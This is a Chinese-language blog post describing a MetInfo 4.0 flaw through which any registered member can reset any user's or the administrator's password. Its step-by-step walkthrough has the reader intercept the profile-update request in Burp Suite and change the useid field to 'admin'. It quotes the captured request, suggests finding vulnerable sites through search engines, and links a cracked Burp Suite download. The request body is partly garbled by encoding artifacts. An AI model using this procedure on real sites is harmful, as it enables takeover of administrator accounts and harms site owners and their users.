简要描述：

MetInfo4.0注册会员后，可以修改任意用户和管理员密码，影响巨大

百度或者谷歌里可以找到上千用MetInfo4.0的企业站，危害特别严重！

详细说明：

百度搜索随便就一大堆，此前没有看到过这个版本的漏洞导致很多人还在继续用4.0版本

漏洞页面:member/save.php 注册页面:/member/ 默认后台:/admin

先注册一个用户然后登录后点击修改基本资料

填写好修改的密码后打开抓包工具进行抓包这里我使用Burp Suite

如果没有的朋友可以去博客前面的文章下载《渗透测试神器Burp Suite v1.6.17破解版下载》

先用火狐设置下http代理 IP为本地:127.0.0.1 端口要和Burp Suite的端口一样 都是8080

默认的Burp Suite监听端口都是8080的

设置好后点击添加信息即可看到如下内容

Cookie: PHPSESSID=004c459b13c11bcf58a388a87942abfb
Content-Type: application/x-www-form-urlencoded
Content-Length: 296
useid=caonima⟨=cn&pass1;=123456.&pass2;=123456.&realname;=&sex;=1&tel;=&mobile;=&email;=123456%40qq.com&qq;=&msn;=&taobao;=&admin;_introduction=&companyname;=%E8%8D%89%E6%B3%A5%E9%A9%AC%E5%85%AC%E5%8F%B8&companyfax;=&companycode;=&companyaddress;=&companywebsite;=&Submit;=%E6%8F%90%E4%BA%A4%E4%BF%A1%E6%81%AF

现在要做的就是修改包的内容 将

useid=caonima //修改成管理员的用户名admin 然后把包放出去即可修改成功。！

点击intercept is on 即可！发送出去 ,如果在网页中提示如下即修改密码成功

修改就可以使用刚才修改的密码登录admin管理员帐号了

声明:请勿用于非法用途,否则后果自负. 转载请注明:小残博客